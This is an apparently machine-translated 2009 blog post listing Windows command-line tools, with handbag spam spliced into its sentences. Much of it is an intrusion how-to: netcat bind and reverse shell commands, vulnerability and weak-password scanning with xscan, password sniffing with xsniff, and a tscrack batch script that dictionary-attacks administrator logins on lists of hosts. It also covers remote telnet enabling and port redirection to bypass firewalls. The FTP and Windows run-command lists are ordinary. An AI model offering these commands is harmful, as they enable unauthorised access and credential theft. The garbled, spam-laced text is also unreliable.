| Back to logs list
3200603 2009 年 06 月 23 日 20:37 Reading (loading. ..) Comments (0) Category: Computer System
DOS command Daquan 3
(b) outside the system commands (tools required to download):
1, Swiss Army knife: nc.exe
Parameter Description:
- h Show help information
-d background mode
-e prog program redirection, but the connection to the implementation of a [dangerous]
-i secs delay interval
-l listen mode, for inbound Station connection
-L listen mode,
tory burch handbags, the connection continues to monitor day after closing until the CTR + C
-n IP addresses, domain names can not record 16
-o film transfer
-p hex [space] port local port number
-r random local and remote port
-t use the Telnet interactively
-u UDP mode
-v verbose output, use-vv more detail
-w timeout delay interval numbers
-z input, output off (when the anchor for the sweep)
basic usage:
nc-nvv 192.168.0.1 80 80 connected to the host 192.168.0.1 Port
nc-l-p 80 to turn on the machine's TCP 80 port and listen
nc-nvv-w2-z 192.168.0.1 80-1024 80-1024 sweep the anchor of 192.168.0.1 port
nc - l-p 5354-t-ec: winntsystem32cmd.exe remote host cmdshell bind the TCP 5354 port in the remote
nc-t-ec: winntsystem32cmd.exe 192.168.0.2 5354 set remote host cmdshell bang and reverse connection The 5354 192.168.0.2 port
Advanced Usage:
nc-L-p 80 as a honey pot with a 1: open and keep listening on port 80, until the CTR + C until the
nc-L-p 80 > c: log.txt as a honey pot with 2: to open and keep listening on port 80, until the CTR + C, while the output to c: log.txt
nc-L-p 80 < c: honeyport.txt as a honey pot with 3-1: Open and constantly listens on port 80,
mulberry handbags, until the CTR + C, and the c: honeyport.txt the content into the pipeline, but also from transfer files to the role of
type.exe c: honeyport | nc-L-p 80 as a honey pot with 3-2: Open and constantly listens on port 80, until the CTR + C, and the c: honeyport. txt contents into the pipeline, can also play a role in transmission of documents
the machine with: nc-l-p port
the machine used in the other host: nc-e cmd.exe local IP-p Local port * win2K
nc-e / bin / sh native IP-p local-port * linux, unix reverse connection firewall
break each other hosts use this machine: nc-d-l-p of the machine port < file to be transferred in each other's path and name of the host
with: nc-vv local IP port > the local file path and name of the store to transfer files to other hosts
Remarks :
| pipe command
< or > redirect command. ; Example: @ dir c: winnt > > d: log.txt meaning: behind the scenes dir, and put the result in d: log.txt in
> and & ; gt; > difference
such as: @ dir c: winnt > > d: log.txt and @ dir c: winnt > d: log.txt two commands to execute the second comparison Look: A > > The second result is to have preserved, but with: > only one result is that the results of a second covered the first.
# 8 Eight:
2, sweep the anchor tool: xscan.exe
basic format
xscan-host < starting IP > [ ,],[lt; host list file name > < test items > [other options] scan anchor active testing whether the survival of
-os host remote operating system detection type (through NETBIOS and SNMP protocol)
-port detection of commonly used services of the port state
-ftp detect weak passwords
-pub FTP FTP service detection Anonymous user write access
-pop3 POP3-Server weak password detection
-smtp test SMTP-Server Vulnerability
-sql testing SQL-Server weak password
-smb detected NT-Server weak password
-iis IIS detection encoding / decoding CGI vulnerability
-cgi vulnerability
-nasl testing Nessus Attack Scripting load testing
-all other options all of the above items
-i adapter ID setting network adapter, < > adapter number can be The host did not respond to skip
-o to open the port does not detect the host
-t the number of concurrent threads, specify the maximum number of concurrent host the number of concurrent threads and concurrent number of hosts, the default number of 100,10
- scan report log file name specified in the file name (suffix: TXT or HTML format)
usage examples
xscan-host 192.168.1.1-192.168.255.255-all-active-p test 192.168.1.1-192.168. 255.255 subnet host all the loopholes, skip-free response of the host
xscan-host 192.168.1.1-192.168.255.255-port-smb-t 150-o test 192.168.1.1-192.168.255.255 host network segment Standard port status, NT weak password user, the maximum number of concurrent threads is 150, not detected open ports to skip the host
xscan-file hostlist.txt-port-cgi-t 200,5-v-o test hostlist.txt >
# 9 September:
3, the command line sniffer: xsniff.exe
LAN FTP/SMTP/POP3/HTTP agreement can capture passwords
Parameter Description
-tcp output data reported
-udp TCP UDP datagram output output
-icmp ICMP packet
-pass filter password information
-hide background
-host to resolve host names
-addr IP address filtering IP address filtering
-port port port
-log file name save the output to a file in ASCII form
-asc output
-hex to 16 hex form of the output
usage Example
xsniff.exe-pass-hide-log pass.log running in the background sniffing passwords and password information stored in the pass.log file
xsniff.exe-tcp-udp-asc-addr 192.168.1.1 olfactory probe tcp and udp 192.168.1.1 and filter information and to ASCII formats
4, Terminal Services password cracking: tscrack.exe
Parameter Description
-h Display Help
-v show version information
-s on the screen shot ability to decrypt the password error
-b sound
-t is issued with multiple connections (multiple threads)
-N Prevent System Log entries on targeted server
-U uninstall remove tscrack component
-f-f using the back of your password
-F interval (frequency)
-l-l using the user name behind the
-w-w use the password behind the use of a dictionary
-p-p password
-D behind the login main page
usage examples
tscrack 192.168.0.1-l administrator-w pass.dic remote sharp break with the password dictionary file host administrator login password
tscrack 192.168.0.1-l administrator-p 123456 123456 telnet 192.168.0.1 with the password of the administrator user
@ if not exist ipcscan.txt goto noscan
@ for / f > (① save 3389.bat) (if the current sweep with SuperScan anchor or other device to open a 3389 sweep to a group of IP hosts list file 3389.txt)
3389.bat means: the file from 3389.txt Take a IP, and then run hack.bat
@ if not exist tscrack.exe goto noscan
@ tscrack% 1-l administrator-w pass.dic > > rouji.txt
: noscan
@ echo tscrack.exe no find or scan faild
(② save hack.bat) (run 3389.bat to OK, and 3389.bat, hack.bat, 3389.txt, pass.dic and tscrack.exe in the same directory; to be waiting for the results of the)
hack.bat means: Run tscrack.exe dictionary storm broke 3389.txt administrator password for all hosts, and the results stored in rouji crack . txt file.
5, Other:
Shutdown.exe
Shutdown IP Address t: 20 20 seconds after the automatic shut down the other side NT (Windows 2003 system comes with tools to use in under Windows2000 have to download the tools to carry with. in front of Windows 2003 DOS commands in detail.)
fpipe.exe (TCP port redirection tool) is described in detail in the second (port redirection to bypass the firewall)
fpipe-l 80-s 1029-r 80
www.sina.com.cn anchor when someone swept your port 80 when he swept to the results of the host information is completely
www.sina.com.cn
Fpipe-l 23-s 88-r 23 target IP to the machine to the target IP request sent by the Telnet port 23 port redirection to port to send to the target by 88 to 23 IP ports. (IP to establish Telnet with the target to use when the machine is connected with 88 ports) and then: Direct Telnet 127.0.0.1 (the local IP) and even received a target IP-23 port.
OpenTelnet.exe (remote turn on telnet tool)
opentelnet.exe IP account password ntlm authentication Telnet port (no need to upload ntlm.exe undermine Microsoft's authentication method) direct remote on the other side of the telnet service After, you can use telnet ip connection to each other.
NTLM authentication method: 0: do not use NTLM authentication; 1: first try to NTLM authentication, if that fails, then use the user name and password; 2: use only NTLM authentication.
ResumeTelnet.exe (OpenTelnet with another tool)
resumetelnet.exe IP username and password to use Telnet to connect the other end, you use this command to restore the other Telnet settings, and also close the Telnet services.
# 10 Ten:
6, FTP commands Detailed:
FTP commands are Internet users one of the most frequently used commands, familiar and flexible application of the internal FTP commands , can greatly facilitate the users, and have a multiplier effect. If you want to learn the use of background FTP download, you have to learn FTP command.
FTP command line format is:
ftp-v-d-i-n-g [host name], where
-v shows all the remote servers response information;
-n limit ftp auto login, which is not used;. n etrc file;
-d to use debug mode;
-g to cancel the global file names.
FTP using the internal command is as follows (in brackets indicate optional):
1.,
miu miu handbags! [cmd [args]]: run on the local machine interactive shell, exit back to ftp environment such as:! ls *. zip
2. $ macro-ame [args]: the implementation of macro macro-name.
3.account [password]: After the success of the remote system to provide login access to system resources required to add a password.
4.append local-file [remote-file]: the local file is appended to the remote system host, if not specified the file name of the remote system, use the local file name.
5.ascii: using the ascii type of transmission.
6.bell: After each command the computer beep once.
7.bin: use binary file transfer mode.
8.bye: exit the ftp session process.
9.case: when using the mget, the remote host file name in the upper to lower case letters.
10.cd remote-dir: the directory into the remote host.
11.cdup: remote host directory into the parent directory.
12.chmod mode file-name: the file-name remote host file access mode set to mode, such as: chmod 777 a.out.
13.close: interrupt the session with the remote ftp server (and the open mapping).
14.cr: transfer files using asscii, it will be converted to carriage return line back to the line.
15.delete remote-file: Delete the file remote host.
16.debug [debug-value]: set the debug mode, showing each to send commands to the remote host, such as: deb up 3, if set to 0, to cancel debug.
17.dir [remote-dir] [local-file]: Display the remote host directory, and the results stored in local files.
18.disconnection: with the close.
19.form format: the file transfer mode is set to format, the default mode for the file.
20.get remote-file [local-file]: the remote host's file remote-file transmitted to the local hard disk of the local-file.
21.glob: Set mdelete, mget, mput file name extension, the default file name without extension, with the-g command line parameter.
22.hash: 1024 bytes per transmission, display a hash sign (#).
23.help [cmd]: show ftp command cmd with the help of internal information,
gucci handbags, such as: help get.
24.idle [seconds]: the remote server, set the sleep timer [seconds] seconds.
25.image: set binary transfer mode (same binary).
26.lcd [dir]: the local working directory to dir.
27.ls [remote-dir] [local-file]: Display remote directory remote-dir, and into the local file local-file.
28.macdef macro-name: define a macro encountered macdef space under the row, the end of the macro definition.
29.mdelete [remote-file]: Delete the file remote host.
30.mdir remote-files local-file: with dir like, but you can specify multiple remote file, such as: mdir *. o. *. zipoutfile.
31.mget remote-files: transmission of multiple remote files.
32.mkdir dir-name: in the remote host in the construction of a directory.
33.mls remote-file local-file: with nlist, but can specify multiple file names.
34.mode [modename]: the file transfer mode is set to modename,
prada leather handbags, the default mode for the stream.
35.modtime file-name: Displays the remote host file was last modified.
36.mput local-file: multiple file transfer to the remote host.
37.newer file-name: If the remote machine, the modification time of file-name the same name than the local hard disk files more recent, then retransmit the file.
38.nlist [remote-dir] [local-file]: displays the list of documents the remote host directory and credited to the local hard disk of the local-file.
39.nmap [inpattern outpattern]: Set the file name mapping mechanism, making the file transfer, file conversion between some characters, such as: nmap $ 1. $ 2. $ 3 [$ 1, $ 2]. [$ 2 ,
prada handbags, $ 3], then transfer files a1.a2.a3, the file name into a1, a2. This command is especially suitable for non-UNIX remote host machine situation.
40.ntrans [inchars [outchars]]: Set the file name character translation mechanism, such as ntrans1R, the file name LLL will become RRR.
41.open host [port]: specify the ftp server connection established, you can specify the connection port.
42.passive: Entering Passive transmission.
43.prompt: set up multiple file transfer interaction when prompted.
44.proxy ftp-cmd: in the secondary control connection, execute a ftp command, which allows to connect the two ftp servers to transfer files between two servers. The first ftp command must be open, to first establish a connection between the two servers.
45.put local-file [remote-file]: the local file local-file sent to the remote host.
46.pwd: Display the current working directory of the remote host.
47.quit: with the bye, exit the ftp session.
48.quote arg1, arg2 ...: verbatim the arguments sent to a remote ftp server, such as: quote syst.
49.recv remote-file [local-file]: the same get.
50.reget remote-file [local-file]: similar to get, but if local-file exists at the resume from the last transmission interruption.
51.rhelp [cmd-name]: remote host a request for help.
52.rstatus [file-name]: If you do not specify a file name, it shows the status of the remote host, or display the file status.
53.rename [from] [to]: change the file name of the remote host.
54.reset: Clear answer queue.
55.restart marker: from the specified marker at the flag, and begin again get or put, such as: restart 130.
56.rmdir dir-name: Remove the remote host directory.
57.runique: Set the file name only one of the store, if the file exists, then the original file suffix .1, .2 and so on.
58.send local-file [remote-file]: with the put.
59.sendport: set the PORT command to use.
60.site arg1, arg2 ...: SITE command parameters as verbatim will be sent to the remote ftp host.
61.size file-name: display the file size of the remote host, such as: site idle 7200.
62.status: Displays the current status of ftp.
63.struct [struct-name]: the file transfer structure is set to struct-name, use the default stream structure.
64.sunique: file name is stored the remote host is set to only one (corresponding with the runique).
65.system: Show remote host's operating system type.
66.tenex: the file transfer type to TENEX machines of the type required.
67.tick: set the transmission of the byte counter.
68.trace: setting package tracking.
69.type [type-name]: set file transfer type to type-name, default is ascii, such as: type binary, set the binary transfer mode.
70.umask [newmask]: the remote server's default umask is set to newmask, such as: umask 3
71.user user-name [password] [account]: remote host to indicate their identity requires a password, you must enter the password, such as: user anonymous my @ email.
72.verbose: with the-v command-line parameters that set the detailed reporting, ftp server, all responses will be displayed to the user, the default is on.
73.? [cmd]: with the help.
# 11 November:
7: The Complete Works of winver --------- Computer Check Run command Windows version
wmimgmt.msc---- Open windows management architecture
wupdmgr -------- windows update
winver --------- check the Windows version of
wmimgmt.msc---- open the windows management architecture
wupdmgr -------- windows update
wscript -------- windows script host settings
write ---------- WordPad winmsd - --- System Information
wiaacmgr ------- Scanner and Camera Wizard
winchat -------- XP comes with LAN chat
mem.exe------ - Display memory usage
Msconfig.exe-- System Configuration Utility
mplayer2 ------- Summary widnows media player
mspaint -------- drawing board
mstsc ---------- Remote Desktop Connection
mplayer2 ------- Media Player
magnify -------- magnifier utility
mmc - Open the console
mobsync -------- ---------- sync command
dxdiag --------- check the DirectX information
drwtsn32 --- --- System Doctor
devmgmt.msc-- Device Manager
dfrg.msc------- Disk Defragmenter
diskmgmt.msc-- the Disk Management utility
dcomcnfg ------- Open the System Component Services
ddeshare ------- Open the DDE sharing settings
dvdplay -------- DVD player
net stop messenger- ---- Stop the Messenger service
net start messenger ---- Start messenger service
notepad -------- Open Notepad
nslookup ------- network management tools Wizard
ntbackup ------- system backup and restore
narrator ------- screen > ntmsoprq.msc-- Removable Storage Manager operation requests
netstat-an ---- (TC) command to check the interface
syncapp -------- create a briefcase
sysedit- ------- System Configuration Editor
sigverif ------- File Signature Verification program
sndrec32 ------- recorder
shrpubw -------- Create a shared folder
secpol.msc----- Local Security Policy
syskey --------- system encryption, encryption can not be solved soon, the dual system of protection of windows xp password
services.msc-- local service set
Sndvol32 ------- Volume Control program
sfc.exe-------- System File Checker
sfc / scannow - -windows file protection
tsshutdn ------- 60 second countdown shutdown command
tourstart ------ xp profile (after the installation is complete roaming xp programs)
taskmgr ---- ---- Task Manager
eventvwr ------- Event Viewer
eudcedit ------- Characters and procedures
explorer ------- Open Windows Explorer
packager ------- Object Packager
perfmon.msc---- computer performance monitoring procedures
progman --------
regedit.exe-Program Manager Registry
rsop.msc------- --- group policy result set
regedt32 ------- Registry Editor
rononce-p ---- 15 seconds off
regsvr32 / u *. dll ---- stop the dll file to run
regsvr32 / u zipfldr.dll------ cancel ZIP support
cmd.exe-------- CMD command prompt
chkdsk.exe----- Chkdsk disk check
certmgr.msc---- Certificate Management utility
calc ----------- start calculator
charmap -------- start Character Map
cliconfg ------- SQL SERVER Client Network Utility
Clipbrd -------- Clipboard Viewer
conf ----------- start netmeeting
compmgmt.msc-- Computer Management
cleanmgr ------- ** finishing
ciadv.msc-- --- indexing service program
osk ------------ Open the on-screen keyboard
odbcad32 ------- ODBC Data Source Administrator
oobe / msoobe / a- --- Check the XP is activated
lusrmgr.msc---- Local Users and Groups
logoff --------- cancellation of orders
iexpress ------- Trojans bundled tools, the system comes
Nslookup ------- IP address detector
fsmgmt.msc----- shared folder manager
utilman -------- auxiliary Utility Manager
gpedit.msc----- Group Policy
Linear Mode
